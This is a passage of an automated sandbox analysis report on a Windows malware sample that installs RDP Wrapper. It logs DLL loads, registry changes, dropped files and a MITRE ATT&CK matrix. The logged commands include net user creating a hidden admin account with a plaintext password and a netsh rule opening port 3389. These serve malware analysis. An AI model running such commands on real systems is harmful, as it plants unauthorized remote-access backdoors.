                        Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe File written: C:\Program Files\RDP Wrapper\rdpwrap.ini
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Directory created: C:\Program Files\RDP Wrapper
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: \??\C:\Windows\symbols\exe\RDPCreator.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3520024706.0000000006CD0000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.pdb` source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.000000000128C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdbRSDS source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: n0C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3516600470.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: RfxVmt.pdbGCTL source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.3.dr
                        Source: Binary string: 00000000000000000400000000000000.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3520024706.0000000006CD0000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: RDPCreator.pdbH source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: \??\C:\Windows\System.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.000000000128C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbI source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.0000000001283000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Configuration.pdbt source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Core.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, WER7437.tmp.dmp.27.dr
                        Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr
                        Source: Binary string: C:\Users\Scarrled\Desktop\test\RDPCreator\RDPCreator\obj\Release\RDPCreator.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.000000000128C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: RfxVmt.pdb source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.3.dr
                        Source: Binary string: System.Core.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Xml.pdb8 source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: RDPCreator.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER7437.tmp.dmp.27.dr
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeStatic PE information: 0xF215694F [Sat Sep 13 23:31:27 2098 UTC]
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeCode function: 0_2_01410507 push edi; retf 0_2_0141050A
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_004430DC push 00443161h; ret 3_2_00443159
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00439674 push ecx; mov dword ptr [esp], ecx 3_2_00439675
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00420164 push 004201DAh; ret 3_2_004201D2
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0040A178 push 0040A1E7h; ret 3_2_0040A1DF
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00437134 push 00437201h; ret 3_2_004371F9
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00443188 push 00443230h; ret 3_2_00443228
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043421C push ecx; mov dword ptr [esp], edx 3_2_0043421E
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0044323C push 004432C7h; ret 3_2_004432BF
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00437298 push 0043732Eh; ret 3_2_00437326
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00437360 push 004373ADh; ret 3_2_004373A5
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043A3F8 push 0043A450h; ret 3_2_0043A448
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_004176D4 push 00417879h; ret 3_2_00417871
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00421998 push 004219E5h; ret 3_2_004219DD
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0042AA70 push ecx; mov dword ptr [esp], edx 3_2_0042AA75
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0040CA10 push eax; retf 0040h 3_2_0040CA11
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0042AAB4 push ecx; mov dword ptr [esp], edx 3_2_0042AAB9
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00415C58 push ecx; mov dword ptr [esp], edx 3_2_00415C5D
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0040EC80 push ecx; mov dword ptr [esp], ecx 3_2_0040EC85
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00404E0C push eax; ret 3_2_00404E48
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043FE8C push 0043FEE0h; ret 3_2_0043FED8

                        Persistence and Installation Behavior

                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_217d5074 /add
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe File created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe File created: C:\Program Files\RDP Wrapper\rdpwrap.dll
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe File created: C:\Windows\System32\rfxvmt.dll
                        Source: C:\Windows\System32\drivers\tsusbhub.sys Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 3_2_0043B58C OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle, 3_2_0043B58C
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe Memory allocated: 1410000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe Memory allocated: 2FC0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe Memory allocated: 4FC0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: OpenSCManagerW,GetLastError,EnumServicesStatusExW,GetLastError,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,GetLastError,CloseServiceHandle, 3_2_0043B7D4
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe Window / User API: threadDelayed 7562
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe Window / User API: threadDelayed 2401
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Dropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dll
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe TID: 6636 Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe TID: 6712 Thread sleep count: 7562 > 30
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe TID: 6732 Thread sleep count: 2401 > 30
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 3_2_004092D8 FindFirstFileW,FindClose, 3_2_004092D8
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 3_2_0040F73C FindFirstFileW,FindClose, 3_2_0040F73C
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 3_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW, 3_2_00408EB9
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 3_2_00409D02 GetSystemInfo, 3_2_00409D02
                        Source: Amcache.hve.27.drBinary or memory string: VMware
                        Source: Amcache.hve.27.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.27.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.27.drBinary or memory string: VMware, Inc.
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000307A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000307D000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 00000014.00000002.1719504971.0000000000998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
                        Source: Amcache.hve.27.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.27.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.27.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.27.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.27.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.27.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.27.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.27.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.0000000001203000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: net1.exe, 00000014.00000002.1719504971.0000000000998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
                        Source: Amcache.hve.27.drBinary or memory string: vmci.sys
                        Source: Amcache.hve.27.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: Amcache.hve.27.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.27.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: Amcache.hve.27.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.27.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.27.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.27.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.27.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: Amcache.hve.27.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.27.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.27.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.27.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.27.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.27.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.27.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.27.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Windows\System32\drivers\tsusbhub.sysSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -iJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /addJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroupJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -iJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allowJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user RDPUser_217d5074 DUF6g)aA2aiB /addJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_217d5074 DUF6g)aA2aiB /addJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_217d5074 /addJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_217d5074 /addJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,3_2_004093C0
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00408908
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,3_2_00412C4A
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,3_2_00412C4C
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,3_2_00412C98
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00411154 GetLocalTime,3_2_00411154
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00414698 GetVersionExW,3_2_00414698
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: Amcache.hve.27.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.27.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.27.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.27.dr | Binary or memory string: MsMpEng.exe

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessions
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnections
MITRE ATT&CK matrix (the number in parentheses is the count of matching signatures shown in the original cell):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | LSASS Driver (1) | LSASS Driver (1) | Disable or Modify Tools (21) | OS Credential Dumping | System Time Discovery (1) | Remote Desktop Protocol (2) | Archive Collected Data (1) | Ingress Tool Transfer (14) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Service Execution (2) | DLL Side-Loading (1) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | System Service Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Create Account (1) | Access Token Manipulation (1) | Obfuscated Files or Information (2) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Windows Service (21) | Windows Service (21) | Timestomp (1) | NTDS | System Information Discovery (27) | Distributed Component Object Model | Input Capture | Application Layer Protocol (15) | Traffic Duplication | Data Destruction
